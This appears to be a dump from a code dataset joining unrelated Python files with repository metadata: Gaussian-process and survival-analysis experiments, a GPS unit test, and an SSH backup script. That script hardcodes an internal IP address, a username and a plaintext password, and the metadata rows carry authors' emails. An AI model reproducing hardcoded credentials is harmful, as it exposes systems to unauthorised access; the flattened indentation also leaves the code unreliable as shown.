self.noise = noise
def _exponential_cov(self, x1, x2):
"""
Return covariance matrix for two arrays,
with i-j element = cov(x_1i, x_2j).
parameters
----------
x1, x2: np.array
arrays containing x locations
"""
return (self.width_scale ** 2) * np.exp(
- np.subtract.outer(x1, x2) ** 2 / (2 * self.length_scale ** 2))
def fit(self, sample_x, sample_y, sample_s):
"""
Save for later use the Cholesky matrix
associated with the inverse that appears
in (5) of post. Also evaluate the weighted
y vector that appears in that equation.
parameters
----------
sample_x : np.array
locations where we have sampled
sample_y : np.array
y values observed at each sample location
sample_s : np.array
array of stds for each sample
"""
self.sample_x = np.array(sample_x)
S = self._exponential_cov(sample_x, sample_x)
d = np.diag(np.array(sample_s) ** 2 + self.noise)
self.lower_cholesky = cholesky(S + d)
self.weighted_sample_y = cho_solve(
(self.lower_cholesky, True), sample_y)
def interval(self, test_x):
"""
Obtain the one-sigam confidence interval
for a set of test points
parameters
----------
test_x : np.array
locations where we want to test
"""
test_x = np.array([test_x]).flatten()
means, stds = [], []
for row in test_x:
S0 = self._exponential_cov(row, self.sample_x)
v = cho_solve((self.lower_cholesky, True), S0)
means.append(np.dot(S0, self.weighted_sample_y))
stds.append(np.sqrt(self.width_scale ** 2 - np.dot(S0, v)))
return means, stds
def sample(self, test_x, samples=1):
"""
Obtain function samples from the posterior
parameters
----------
test_x : np.array
locations where we want to test
samples : int
Number of samples to take
"""
S0 = self._exponential_cov(test_x, self.sample_x)
# construct covariance matrix of sampled points.
m = []
for row in S0:
m.append(cho_solve((self.lower_cholesky, True), row))
cov = self._exponential_cov(test_x, test_x) - np.dot(S0, np.array(m).T)
mean = np.dot(S0, self.weighted_sample_y)
return np.random.multivariate_normal(mean, cov, samples)
def smooth(data, window):
out0 = np.convolve(data, np.ones(window, dtype=int), 'valid') / window
r = np.arange(1, window - 1, 2)
start = np.cumsum(data[:window - 1])[::2] / r
stop = (np.cumsum(data[:-window:-1])[::2] / r)[::-1]
return np.concatenate(( start , out0, stop ))
# Insert data here.
data = pd.read_csv('./UAH/D1/20151110175712-16km-D1-NORMAL1-SECONDARY/RAW_GPS.txt',
sep='\s+', names=['time', 'speed'], usecols=[0, 1])
time = np.arange(10, 600, 0.1)
speed = np.interp(time, data['time'], data['speed'])
DURATION = 500
PREDICTION = 50
WIDTH_SCALE = 10
LENGTH_SCALE = 5
SAMPLES = 20
colors = cycle(['g', 'b', 'k', 'y', 'c', 'r', 'm'])
fig = plt.figure()
model = SimpleGP(WIDTH_SCALE, LENGTH_SCALE)
for i in range(10):
ix = np.arange(i * DURATION, (i + 1) * DURATION + 1, PREDICTION)
num = len(ix)
sample_x = time[ix]
sample_y = speed[ix] - np.mean(speed[ix])
sample_s = 0.1 * np.random.rand(num) * np.ones_like(sample_x)
m_speed = np.mean(speed[ix])
model.fit(sample_x, sample_y, sample_s)
test_x = np.arange(sample_x[0], sample_x[-1] + 5, .1)
means, stds = model.interval(test_x)
samples = model.sample(test_x, SAMPLES)
# plots here.
# ax = fig.add_subplot(511+i)
plt.errorbar(test_x, means + m_speed, yerr=stds,
ecolor='g', linewidth=1.5,
elinewidth=0.5, alpha=0.75)
for sample, c in zip(samples, colors):
plt.plot(test_x, sample + m_speed, c, linewidth=2. * np.random.rand(), alpha=0.5)
plt.plot([sample_x[0], sample_x[0]], [np.min(sample_y + m_speed), np.max(sample_y + m_speed)], c='r', ls='--')
plt.plot([sample_x[-1], sample_x[-1]], [np.min(sample_y + m_speed), np.max(sample_y + m_speed)], c='r', ls='--')
ix = np.arange(i * DURATION, (i + 1) * DURATION + PREDICTION, PREDICTION)
real_x = time[ix]
real_y = speed[ix]
real_y = smooth(real_y, 3)
plt.plot(real_x, real_y, c='b', linewidth=2) | [
"yangwei0705@gmail.com"
] | yangwei0705@gmail.com |
666073459ed0ddc9addc536eaef21ca68580cbb7 | 4bcbb6a73e00acb0c08d709f71d13a5e563076ca | /plot.py | 8e6fdbeaf0c0159445e2d0821cc27bf1505219c0 | [] | no_license | WellJoea/MLSurvival | 1ec89af7b11fdb294f59a7600dfc5f669e275068 | 55a5431bbcf61e2da262a7f612a83fb43276a0ab | refs/heads/master | 2020-08-02T03:48:26.816226 | 2019-09-27T03:06:37 | 2019-09-27T03:06:37 | 200,193,562 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 25,339 | py |
from sklearn.metrics import roc_curve, precision_recall_curve, auc, average_precision_score, accuracy_score
from sklearn.preprocessing import label_binarize
from sklearn.linear_model import Ridge, Lasso
from statsmodels.stats.outliers_influence import variance_inflation_factor
#import scikitplot as skplt
import pandas as pd
import numpy as np
np.set_printoptions(threshold=np.inf)
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib.patches import Patch
from matplotlib.lines import Line2D
from matplotlib.backends.backend_pdf import PdfPages
import seaborn as sns
import fastcluster
import os
def opens(group):
group = pd.read_csv(group, header=0, encoding='utf-8', sep='\t').fillna(np.nan)
AYa = group[(group.Group == 'Y') | (group.Group.str.contains('S_')) ].Variables.tolist()
RYa = group[(group.Group == 'Y') & (group.Type =='R') ].Variables.tolist()
CYa = group[(group.Group == 'Y') & (group.Type =='C') ].Variables.tolist()
Sya = group[(group.Group.str.contains('S_')) & (group.Type.isin( ['S', 'T']))]
Xa = group[(group.Group != 'Y') & ~(group.Group.str.contains('S_')) ].Variables.tolist()
Xg = group[(group.Group != 'Y') & ~(group.Group.str.contains('S_')) ][['Variables','Group']]
Xg.set_index('Variables', inplace=True)
SYa = pd.DataFrame([],columns=['T','S'])
for i, j in Sya.iterrows():
SYa.loc[ j.Group , j.Type ] = j.Variables
return Xg
#return (group, AYa, RYa, CYa, SYa, Xa, Xg)
class Baseset():
def __init__(self, outfile, *array, **dicts):
self.out = outfile
os.system('mkdir -p '+ os.path.dirname(self.out))
self.array = array
self.dicts = dicts
self.color_ = ['#009E73', '#FF2121', '#00C5CD', '#6600CC', '#E7A72D', '#EE7AE9',
'#B2DF8A', '#CAB2D6', '#B97B3D', '#0072B2', '#FFCC00', '#0000FF',
'#8E8E38', '#6187C4', '#FDBF6F', '#666666', '#33A02C', '#FB9A99',
'#D9D9D9', '#FF7F00', '#1F78B4', '#FFFFB3', '#5DADE2', '#95A5A6',
'#FCCDE5', '#FB8072', '#B3DE69', '#F0ECD7', '#CC66CC', '#A473AE',
'#FF0000', '#EE7777', '#ED5401']
self.linestyle_= [ ':', '--', '-.']
self.markertyle_ = ['X', 'P', '*', 'v', 's','o','^']
font = {#'family' : 'normal',
'weight' : 'normal',
'size' : 14}
plt.rc('font', **font)
plt.figure(figsize=(10,10))
plt.margins(0,0)
plt.rcParams.update({'figure.max_open_warning': 1000})
sns.set(font_scale=1)
#plt.rc('xtick', labelsize=20)
#plt.rc('ytick', labelsize=20)
#plt.rcParams['font.size'] = 23
#plt.rcParams.update({'font.size': 22})
#plt.rcParams['legend.fontsize'] = 'large'
#plt.rcParams['figure.titlesize'] = 'medium'
class MPlot(Baseset):
def Feature_Coefs(self, All_coefs_):
plt.figure(figsize=(13,10))
color_ = self.color_*All_coefs_.shape[0]
linestyle_ = self.linestyle_*All_coefs_.shape[0]
markertyle_ = self.markertyle_*All_coefs_.shape[0]
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(20,10), gridspec_kw={'wspace': 0.1}, sharex=True)
fig.suptitle('coefs_ importance ROC Accuracy', x=0.5 )
fig.subplots_adjust(0.05,0.2,0.87,0.95)
fig.text(0.45, 0.03, '%s featrues'%All_coefs_.shape[0] , ha='center', va='center')
for x,y,z in zip(['coef_', 'exp(coef_)' ], [ax1, ax2], [ 'coefficients', 'hazard ratio'] ):
coefs_df = All_coefs_.filter( regex=r'^%s(\.[0-9]+)?$'%x, axis=1 )
if x == 'exp(coef_)':
coefs_df = All_coefs_.filter( regex=r'exp\(coef_\)(\.[0-9]+)?$', axis=1 )
for i,j in enumerate(coefs_df.columns):
y.plot( coefs_df[j],
marker=markertyle_[i],
markersize=3.2,
color=color_[i],
linestyle=linestyle_[i],
lw=1.0, label='')
y.plot(All_coefs_['%s_mean'%x] , 'k-.', lw=1.5, label='mean_coef_',alpha= 0.9 )
y.plot(All_coefs_['%s_median'%x], 'k--', lw=1.0, label='median_coef_',alpha= 0.5 )
y.fill_between( All_coefs_.index,
All_coefs_['%s_mean'%x]-1*All_coefs_['%s_std'%x],
All_coefs_['%s_mean'%x]+1*All_coefs_['%s_std'%x],
color='grey', alpha=0.3, label=r'$\pm$ 1 std. dev.')
if x == 'exp(coef_)':
y.plot(All_coefs_['exp(coef_mean)'], 'k:', lw=1.0, label='exp(coef_mean)',alpha= 0.5 )
y.set_ylabel(x)
#y.set_xlabel('%s featrues'%All_coefs_.shape[0])
y.set_xticklabels( All_coefs_.index, rotation='270')
legend_elements=[ Line2D([0], [0], color=color_[0], marker=markertyle_[0], linestyle=linestyle_[0], markersize=3.2, lw=1, label='CV times'),
Line2D([0], [0], color='k', linestyle='-.', lw=1.5, alpha= 0.9, label='coef_/exp(coef_) mean'),
Line2D([0], [0], color='k', linestyle='--', lw=1.0, alpha= 0.5, label='coef_/exp(coef_) median'),
Line2D([0], [0], color='k', linestyle=':' , lw=1.0, alpha= 0.5, label='exp(coef_mean)'),
Patch(facecolor='grey', edgecolor='black' , alpha=0.3, label=r'$\pm$ 1 std. dev.')
]
leg = plt.legend(handles=legend_elements,
title='Features',
numpoints=1,
bbox_to_anchor=(1.0, 0.5),
prop={'size':11}, loc='center left')
plt.savefig( self.out, bbox_extra_artists=(leg,) ) # , bbox_inches='tight')
plt.close()
def Feature_Import_box(self, All_coefs_, Xg, label, Y_name, Model, sort_by_group=True):
All_import = All_coefs_.filter( regex=r'^%s.*'%label, axis=1 )
color_ = self.color_*All_import.shape[0]
linestyle_ = self.linestyle_*All_import.shape[0]
markertyle_ = self.markertyle_*All_import.shape[0]
All_import = pd.concat([All_import, Xg[['Group']]],axis=1, join='inner', sort=False)
Xg_cor = All_import.Group.unique()
cor_dict = dict(zip(Xg_cor, color_[:len(Xg_cor)]))
All_import['ColorsX'] = All_import.Group.map(cor_dict)
if sort_by_group:
All_import.sort_values(by=['Group', label+'_median', label+'_mean'], ascending=[True, False, False], inplace=True, axis=0)
color_a = ['red' if i >= 0 else 'blue' for i in All_import[label+'_median']]
color_b = ['red' if i < 0 else 'blue' for i in All_import[label+'_median']]
color_c = All_import['ColorsX'].to_list()
All_raw = All_import[label]
All_raw = All_import.filter( regex=r'^%s(\.[0-9]+)?$'%label, axis=1 )
if label == 'exp(coef_)':
All_raw = All_import.filter( regex=r'exp\(coef_\)(\.[0-9]+)?$', axis=1 )
print(All_raw.head())
column = sorted(set(All_raw.columns))
X_labels = All_raw.index.to_list()
Y_sd_min = All_import[label+'_mean'] - 1*All_import[label+'_std']
Y_sd_max = All_import[label+'_mean'] + 1*All_import[label+'_std']
#plt.plot(All_import['0_mean'], 'k-.', lw=1.5, label='mean_import', alpha=0.9)
plt.figure(figsize=(13,10))
plt.fill_between( X_labels, Y_sd_min, Y_sd_max,
color='grey', alpha=0.3, label=r'$\pm$ 1 std. dev.')
legend_elements=[ Patch(facecolor=cor_dict[g], edgecolor='r', label=g) for g in sorted(cor_dict.keys()) ]
if All_import[label+'_median'].min() <0:
legend_elements.append(Patch(facecolor='white', edgecolor='blue', label=r'coefs_ $\geq$0') )
legend_elements.append(Patch(facecolor='white', edgecolor='red' , label=r'coefs_ <0') )
legend_elements.append(Patch(facecolor='grey', edgecolor='black' , alpha=0.3, label=r'$\pm$ 1 std. dev.') )
ncol_ = 1 if len(legend_elements) <=6 else 2
bplot =plt.boxplot(All_raw,
patch_artist=True,
vert=True,
labels=X_labels,
notch=0,
positions=range(len(X_labels)),
meanline=True,
showmeans=True,
meanprops={'linestyle':'-.'}, #'marker':'*'},
sym='+',
whis=1.5
)
for i, patch in enumerate(bplot['boxes']):
patch.set(color=color_b[i], linewidth=1.3)
patch.set(facecolor = color_c[i])
for element in [ 'means','medians','fliers']: #['boxes', 'whiskers', 'fliers', 'means', 'medians', 'caps']
for i, patch in enumerate(bplot[element]):
patch.set(color=color_b[i], linewidth=1)
plt.title(Y_name + ' ' + Model + ' coefs_ ROC Accuracy')
plt.legend(handles=legend_elements, ncol=ncol_, prop={'size':11}, loc='upper right')
plt.ylabel(Y_name + ' ' + Model + ' coefs_ values')
plt.xticks(rotation='270')
plt.savefig(self.out, bbox_inches='tight')
def Score_1(self, score ):
All_mean = score.groupby([score.index]).mean()
All_median = score.groupby([score.index]).median()
All_Score = All_mean[['OS_months', 'OS_status_B']]
All_Score['risk_score_mean'] = All_mean['risk_score']
All_Score['risk_score_median'] = All_median['risk_score']
All_Score.sort_values(by=['OS_months', 'OS_status_B'],
ascending=[True, True], inplace=True, axis=0)
All_Score.to_csv('bb.xls',sep='\t',index=True)
#fig, (ax1,ax2,ax3) = plt.subplots(3, 1, figsize=(All_Score.shape[0]/5,13), gridspec_kw={'wspace': 0, 'hspace': 0}, sharex=True)
plt.figure(figsize=(All_Score.shape[0]/5,13))
#fig.suptitle('coefs_ importance ROC Accuracy', x=0.5 )
#fig.subplots_adjust(0.05,0.2,0.87,0.95)
ax1 = plt.subplot2grid((13, 1), (0, 0), rowspan=10)
ax1.plot(All_Score['risk_score_mean'], 'r--', marker='*', linewidth=1.3, markersize=4.2, label='risk_score_mean')
ax1.plot(All_Score['risk_score_median'], 'b:' , marker='^', linewidth=1.3, markersize=4.2, label='risk_score_median')
ax1.scatter(score.index, score['risk_score'], c='g', marker='o', s=15.2)
ax1.set_xticks([])
ax2 = plt.subplot2grid((13, 1), (10, 0), rowspan=2)
ax2.plot(All_Score['OS_months'], 'k-' , marker='s', linewidth=1.5, markersize=4.2, label='risk_score_median')
#ax1.scatter(score.index, score['risk_score'], c='g', marker='o', s=15.2)
ax3 = plt.subplot2grid((13, 1), (12, 0), rowspan=1)
ax3.pcolor(All_Score[['OS_status_B']].T, cmap=plt.cm.summer)
ax3.set_yticks([])
ax3.set_ylabel('OS_status')
#ax3.legend()
plt.xticks(rotation='270')
plt.savefig( self.out ) #,bbox_inches='tight')
plt.close()
def Score_(self, score ):
All_mean = score.groupby([score.index]).mean()
All_median = score.groupby([score.index]).median()
All_Score = All_mean[['OS_months', 'OS_status_B']]
All_Score['risk_score_mean'] = All_mean['risk_score']
All_Score['risk_score_median'] = All_median['risk_score']
All_Score.sort_values(by=['OS_months', 'OS_status_B'],
ascending=[True, True], inplace=True, axis=0)
All_Score.to_csv('bb.xls',sep='\t',index=True)
import matplotlib.gridspec as gridspec
fig = plt.figure(figsize=(All_Score.shape[0]/5,13) )
fig.suptitle('coefs_ importance ROC Accuracy', x=0.5,y =0.92 )
gs = gridspec.GridSpec(13, 1)
ax1 = plt.subplot(gs[:1, :])
ax1.pcolor(All_Score[['OS_status_B']].T, cmap=plt.cm.summer)
ax1.set_xticks([])
ax1.set_ylabel('OS_status')
ax2 = plt.subplot(gs[1:3, :])
ax2.grid(True)
ax2.plot(All_Score['OS_months'], 'c-' , marker='s', linewidth=1.5, markersize=4.2, label='risk_score_median')
ax2.pcolor(All_Score[['OS_status_B']].T, cmap=plt.cm.winter)
ax2.set_xticks([])
ax2.set_ylabel('OS_months')
ax2.grid(which='major', axis='both')
ax3 = plt.subplot(gs[3:14, :] )
ax3.plot(All_Score['risk_score_mean'], 'r--', marker='*', linewidth=1.3, markersize=4.2, label='risk_score_mean')
ax3.plot(All_Score['risk_score_median'], 'b:' , marker='^', linewidth=1.3, markersize=4.2, label='risk_score_median')
ax3.scatter(score.index, score['risk_score'], c='g', marker='o', s=15.2, label='risk_score_all')
ax3.set_xticklabels( All_Score.index, rotation='270')
ax3.set_ylabel('risk_scores')
ax3.set_xlim(All_Score.index[0], All_Score.index[-1])
ax3.legend()
plt.savefig( self.out ,bbox_inches='tight')
plt.close()
def scor_S(score):
All_mean = score.groupby([score.index]).mean()
All_median = score.groupby([score.index]).median()
All_Score = All_mean[['OS_months', 'OS_status_B']]
All_Score['risk_score_mean'] = All_mean['risk_score']
All_Score['risk_score_median'] = All_median['risk_score']
All_Score['exp_risk_score_mean'] = np.exp(All_mean['risk_score'])
All_Score['exp_risk_score_median'] = np.exp(All_median['risk_score'])
All_Score.to_csv('aa.xls',sep='\t',index=True)
#file = r'C:\Users\lenovo\Desktop\MLSurvival\MLtest\Result\CoxPH\03ModelFit\CoxPH_S_OS_months_Survival_coefficients.xls'
#dataf= pd.read_csv(file, header=0, index_col='Sample', encoding='utf-8', sep='\t').fillna(np.nan)
#print(dataf.head())
#group=r'C:\Users\lenovo\Desktop\MLSurvival\MLtest\Data.222.25.group.txt'
#group=r'~/Desktop/MLSurvival/MLtest/Data.222.25.group.txt'
#Xg = opens(group)
#print(Xg.head())
#MPlot('aa.pdf').Feature_Import_box(dataf, Xg, 'coef_', 'OS_months', 'CoxPH', sort_by_group=False)
#score=r'C:\Users\lenovo\Desktop\MLSurvival\MLtest\Result\CoxPH\03ModelFit\CoxPH_S_OS_months_Survival_TrainTest_risk_score.detail.xls'
#score=r'~/Desktop/MLSurvival/MLtest/Result/CoxPH/03ModelFit/CoxPH_S_OS_months_Survival_risk_score.xls'
#MPlot('aa.pdf').Score_(score)
#score=r'C:\Users\lenovo\Desktop\MLSurvival\MLtest\Result\CoxPH\03ModelFit\CoxPH_S_RFS_months_Survival_TrainTest_risk_score.final.xls'
#score=r'~/Desktop/MLSurvival/MLtest/Result/CoxPH/03ModelFit/CoxPH_S_OS_months_Survival_risk_score.xls'
#score= pd.read_csv(score, header=0, index_col='Sample', encoding='utf-8', sep='\t').fillna(np.nan)
#print(score)
from sksurv.datasets import load_veterans_lung_cancer
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sksurv.nonparametric import kaplan_meier_estimator
from sksurv.preprocessing import OneHotEncoder
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 500)
pd.set_option('display.width', 1000)
from lifelines.statistics import logrank_test
from lifelines import CoxPHFitter
from sksurv.linear_model import CoxPHSurvivalAnalysis, CoxnetSurvivalAnalysis
from sksurv.nonparametric import kaplan_meier_estimator
def NotParamete(df, event, time, term):
cph = CoxPHFitter()
cheakpoint = np.unique( np.percentile(df[term] , np.linspace(10, 90, 99)) )
for ic in cheakpoint:
point = (df[term] >= ic)
T1 = df[point][time]
E1 = df[point][event]
T2 = df[~point][time]
E2 = df[~point][event]
results = logrank_test(T1, T2, event_observed_A=E1, event_observed_B=E2)
cph.fit(df[[event, time, term]], time, event)
cph.print_summary()
print(cph.hazard_ratios_, cph.score_)
print(results.p_value)
return(results)
def COX():
estimator = CoxPHSurvivalAnalysis(alpha=0.5, n_iter=100, tol=1e-09, verbose=0)
parameters = { 'alpha' : [0, 1e-5, 1e-4, 1e-3, 1e-2, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1],
'n_iter' : [300],
'tol' : [1e-09],
'verbose': [0] },
return ( estimator, parameters )
def NET():
estimator = CoxnetSurvivalAnalysis(n_alphas=1000,
alphas=None,
alpha_min_ratio=0.0001,
l1_ratio=0.5,
penalty_factor=None,
normalize=False,
copy_X=True,
tol=1e-07,
max_iter=100000,
verbose=False,
fit_baseline_model=False,
)
parameters = { 'n_alphas' : [ 50, 80, 100, 200, 500, 700, 1000 ] ,
'alphas' : [None],
'alpha_min_ratio' : [0.0001],
'l1_ratio' : np.arange(0.01,1,0.01),
'penalty_factor' : [None],
'normalize' : [False],
'copy_X' : [True],
'tol' : [1e-07],
'max_iter' : [100000],
'verbose' : [False],
'fit_baseline_model': [False],
}
return ( estimator, parameters )
#Data=r'C:\Users\lenovo\Desktop\MLSurvivalv0.01\test\Result\CoxPH\02FeatureSLT\CoxPH_S_OS_months_Survival_FeatureSLT.Data.xls'
Data = r'./test/Result/CoxPH/02FeatureSLT/CoxPH_S_OS_months_Survival_FeatureSLT.Data.xls'
DF = pd.read_csv(Data, header=0, index_col='Sample', encoding='utf-8', sep='\t').fillna(np.nan)
_S_Time= 'OS_status'
_T_Time= 'OS_months'
_Xa = [i for i in DF.columns if i not in [_S_Time, _T_Time]]
DF[_S_Time +'_B'] = DF[_S_Time].apply(lambda x: True if x >0 else False)
Y_df = DF[[_S_Time+'_B', _T_Time ]].to_records(index = False)
print(DF.describe())
cph = CoxPHFitter(alpha=0.05, tie_method='Efron', penalizer=0.5, strata=None)
cph.fit( DF[ _Xa + [_S_Time, _T_Time ]], _T_Time, _S_Time )
cph.print_summary()
print(cph.score_)
def COX_(cox):
cphe, cphp = cox
cphe.fit(DF[_Xa], Y_df)
print(cphe.coef_, np.exp(cphe.coef_), cphe.score(DF[_Xa], Y_df))
#COX_(COX())
import matplotlib
matplotlib.use('TkAgg')
#matplotlib.use('MacOSX')
import matplotlib.pyplot as plt
from sklearn.model_selection import (StratifiedShuffleSplit, LeaveOneOut, StratifiedKFold,
RepeatedKFold, RepeatedStratifiedKFold, train_test_split,
GridSearchCV, RandomizedSearchCV )
from sklearn.utils import safe_sqr
def NET_(net):
cphe, cphp = net
cphe.fit(DF[_Xa], Y_df)
print(cphe.coef_.shape, cphe.alphas_,1111) # np.exp(cphe.coef_), cphe.score(DF[_Xa], Y_df))
print(cphe.coef_[:, -1], 2222)
print(cphe.predict(DF[_Xa]),999999999999999999)
#print(cphe.coef_)
#plt.plot(cphe.alphas_, safe_sqr(cphe.coef_).T)
#plt.plot(cphe.alphas_,cphe.deviance_ratio_)
aa = cphe.alphas_
bb = cphe.coef_.T
scorcs= []
print(cphe)
print(cphe.score(DF[_Xa], Y_df),22222)
for i in aa:
cphe.set_params(alphas= [i])
cphe.fit(DF[_Xa], Y_df)
scorcs.append(cphe.score(DF[_Xa], Y_df))
#print( aa, scorcs)
#plt.plot(aa,scorcs)
#plt.show()
scorcs = np.array(scorcs)
print(np.where(scorcs==scorcs.max()), scorcs[np.where(scorcs==scorcs.max())], 3333333333)
aa_best= aa[np.where(scorcs==scorcs.max())]
cphe.set_params(alphas= aa_best)
cphe.fit(DF[_Xa], Y_df)
print( cphe.score(DF[_Xa], Y_df) ,55555555555)
print( cphe.coef_, 6666666666)
print( cphe.predict(DF[_Xa]),999999999999999999)
return (aa, bb )
cbs_, ccf_ = NET_(NET())
def SNet_():
class CoxnetSurvivalAnalysis_(CoxnetSurvivalAnalysis):
#def __init__(self, **kwargs):
# #super().__init__()
# CoxnetSurvivalAnalysis.__init__(self)
# #super(CoxnetSurvivalAnalysis, self).__init__()
# self.coefs_ = ''
def fit(self, X, y):
super(CoxnetSurvivalAnalysis_, self).fit(X, y)
self.max_id = np.where( self.deviance_ratio_ == self.deviance_ratio_.max() )
self.coefs_ = self.coef_
self.coef_ = self.coefs_[:, self.max_id[-1] ]
self.alphab_ = self.alphas_[self.max_id[-1]]
return self
def _get_coef(self, alpha):
check_is_fitted(self, "coef_")
if alpha is None:
coef = self.coef_[:, -1]
else:
coef = self._interpolate_coefficients(alpha)
return coef
def predict(self, X):
super(CoxnetSurvivalAnalysis_, self).predict(X, alpha=self.alphab_)
cphe = CoxnetSurvivalAnalysis_( n_alphas=1000,
alphas=None,
alpha_min_ratio=0.0001,
l1_ratio=0.5,
penalty_factor=None,
normalize=False,
copy_X=True,
tol=1e-07,
max_iter=100000,
verbose=False,
fit_baseline_model=False,
)
cphe.fit(DF[_Xa], Y_df)
print( cphe.score(DF[_Xa], Y_df ) ,55555555555)
print(cphe.max_id, 23232323, cphe.coef_, cphe.coefs_.shape) # np.exp(cphe.coef_), cphe.score(DF[_Xa], Y_df))
print(cphe.predict(DF[_Xa], alpha = cphe.max_id),9999999999999)
return (cphe.alphas_, cphe.coefs_.T )
als_ , cs_ = SNet_()
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(10,10), gridspec_kw={'wspace': 0.1} ) #, sharex=True)
ax1.plot(cbs_, ccf_ )
ax2.plot(als_ , cs_ )
plt.show()
def Grid(NET):
estimator, parameters = NET
clf = GridSearchCV( estimator, parameters,
n_jobs=-1,
cv=5,
scoring=None,
error_score = np.nan,
return_train_score=True,
refit = True,
iid=True)
clf.fit(DF[_Xa], Y_df)
scor_ = clf.score(DF[_Xa], Y_df)
print(clf.best_params_)
print(clf.best_estimator_.coef_.shape, clf.best_estimator_.alphas_) # np.exp(cphe.coef_), cphe.score(DF[_Xa], Y_df))
#print(clf.predict(DF[_Xa]))
print(scor_, 1111111111)
aa = clf.best_estimator_.alphas_
'''
from copy import copy
es = copy( clf.best_estimator_ )
ps = {"alphas": [[v] for v in aa]}
glf = GridSearchCV( es , ps ,
n_jobs=-1,
cv=5,
scoring=None,
error_score = np.nan,
return_train_score=True,
refit = True,
iid=True)
glf.fit(DF[_Xa], Y_df)
print(glf.score(DF[_Xa], Y_df), 2222222222)
print(glf.best_estimator_.alphas_, 2222222222)
'''
plt.plot(aa, clf.best_estimator_.deviance_ratio_)
scorcs= []
for i in aa:
clfa = clf.best_estimator_
clfa.set_params(alphas= [i])
clfa.fit(DF[_Xa], Y_df)
scorcs.append(clfa.score(DF[_Xa], Y_df))
print(len( scorcs) , len(aa), 44444)
scorcs = np.array(scorcs)
print(np.where(scorcs==scor_), scorcs[np.where(scorcs==scor_)], 222222222)
print(np.where(scorcs==scorcs.max()), scorcs[np.where(scorcs==scorcs.max())], 3333333333)
aa_best= aa[np.where(scorcs==scorcs.max())]
clfn = clf.best_estimator_
clfn.set_params(alphas= aa_best)
clfn.fit(DF[_Xa], Y_df)
print( clfn.score(DF[_Xa], Y_df) ,55555555555)
print( clfn.coef_, 6666666666)
parameters_n = parameters
parameters_n['alphas'] = [ aa_best]
print(parameters_n)
clf_p = GridSearchCV( clf.best_estimator_, parameters_n,
n_jobs=-1,
cv=5,
scoring=None,
error_score = np.nan,
return_train_score=True,
refit = True,
iid=True)
clf_p.fit(DF[_Xa], Y_df)
scor_p = clf_p.score(DF[_Xa], Y_df)
print(scor_p)
'''
plt.plot(aa,scorcs, label='each')
#plt.plot(aa,scor_, label='all')
plt.xlim([0.01,0.020])
plt.ylim([0.78,0.82])
plt.show()
'''
#Grid(NET()) | [
"zhou.wei@genecast.com.cn"
] | zhou.wei@genecast.com.cn |
cf23584d33bfce84f66ef72be8a26832c836ce80 | faaee65a7392744238690fec6bf6dc273e17f7a6 | /backupsw/backup.py | 30c876771ab15c0e3e346b35b447abb639b9882e | [] | no_license | qingyunha/anchnet | 84df043ddee6a464462d5ce53a8e425f86a35330 | b6365693e049cd5852af35c41738599ac5d0f88e | refs/heads/master | 2021-01-19T03:10:41.008609 | 2016-07-26T16:12:35 | 2016-07-26T16:12:35 | 48,851,619 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 580 | py | import os
from os import path
from datetime import date
from ssh import sshClient
BACKUP_FOLDER = "data"
def backup(host, user, passwd):
today = date.today()
client = sshClient(host, user, passwd)
config = client.run("DISPLAY_CONFIG")
if config:
d = path.join(BACKUP_FOLDER, host)
if not path.exists(d):
os.mkdir(d)
filename = "{0!s}.txt".format(today)
f = open(path.join(d, filename), "wb")
f.write(config)
f.close()
if __name__ == "__main__":
backup('10.155.1.211', 'sunc', 'www.51idc.com')
| [
"root@ubuntu.anchnet"
] | root@ubuntu.anchnet |
7c421c57614eaf8a0166b2cb606e6186fb0a4dec | 0f14296a33878c609a7fa2f714146f3a3a3865b2 | /DroneFramework/test/testDataGPS.py | 15fee293428231d7c339837ed9bc814f9cf015dc | [] | no_license | eduardodisanti/drone_control | 8579b7fa2e7706625f5e889e443e4c986d26e591 | 47253c7cd62ccdb84c34e135697b3c6735934d16 | refs/heads/master | 2020-06-12T11:27:21.883690 | 2016-05-23T15:20:29 | 2016-05-23T15:20:29 | 194,284,926 | 1 | 0 | null | 2019-06-28T14:13:30 | 2019-06-28T14:13:30 | null | UTF-8 | Python | false | false | 1,331 | py | import unittest
from hal.sensorDataGPS import SensorDataGPS
from datetime import *
data = {'latitud': 543, 'longitud': 345, 'altitud': 656}
class SensorDataGPSTest(unittest.TestCase):
def setUp(self):
self.dataGPS = SensorDataGPS(data, datetime.today())
def test_getData_NoNone(self):
self.assertIsNotNone(self.dataGPS.getData())
def test_getData_Latitud(self):
self.assertEquals(self.dataGPS.getData()['latitud'], data['latitud'])
def test_getData_Longitud(self):
self.assertEquals(self.dataGPS.getData()['longitud'], data['longitud'])
def test_getData_altitud(self):
self.assertEquals(self.dataGPS.getData()['altitud'], data['altitud'])
def test_getData(self):
self.assertEquals(self.dataGPS.getData(), data)
def test_setData(self):
dataGPS = self.dataGPS
new_data = {'latitud': 234, 'longitud': 178, 'altitud': 756}
dataGPS.setData(new_data)
self.assertEquals(dataGPS.getData(), new_data)
def test_getAge(self):
self.assertIsNotNone(self.dataGPS.getData())
def test_setAge(self):
dataGPS = self.dataGPS
new_age = datetime.today()
dataGPS.setAge(new_age)
self.assertEquals(dataGPS.getAge(), new_age) | [
"eduardo.disanti@gmail.com"
] | eduardo.disanti@gmail.com |
4977e964f6a721f8ea57369593d991f4cafa79f4 | 13259e2e7d17cc68b0e9b5fc8cb94e66e13bd666 | /catkin_ws/build/catkin_generated/order_packages.py | c28f4543128ca1aa414364df35a5521529847279 | [] | no_license | AnirudhSundar4597/AuE893Spring21_AnirudhSundar | f80310edc507d8d36e93deaf1706b905e786bb08 | a6af95e6e660db561221f692283b796a717d9c95 | refs/heads/master | 2023-04-01T20:12:50.095351 | 2021-04-07T23:06:04 | 2021-04-07T23:06:04 | 333,598,202 | 0 | 2 | null | 2021-02-07T21:38:10 | 2021-01-28T00:24:19 | Makefile | UTF-8 | Python | false | false | 424 | py | # generated from catkin/cmake/template/order_packages.context.py.in
source_root_dir = '/home/anirudh/git_ws/AuE893Spring21_AnirudhSundar/catkin_ws/src'
whitelisted_packages = ''.split(';') if '' != '' else []
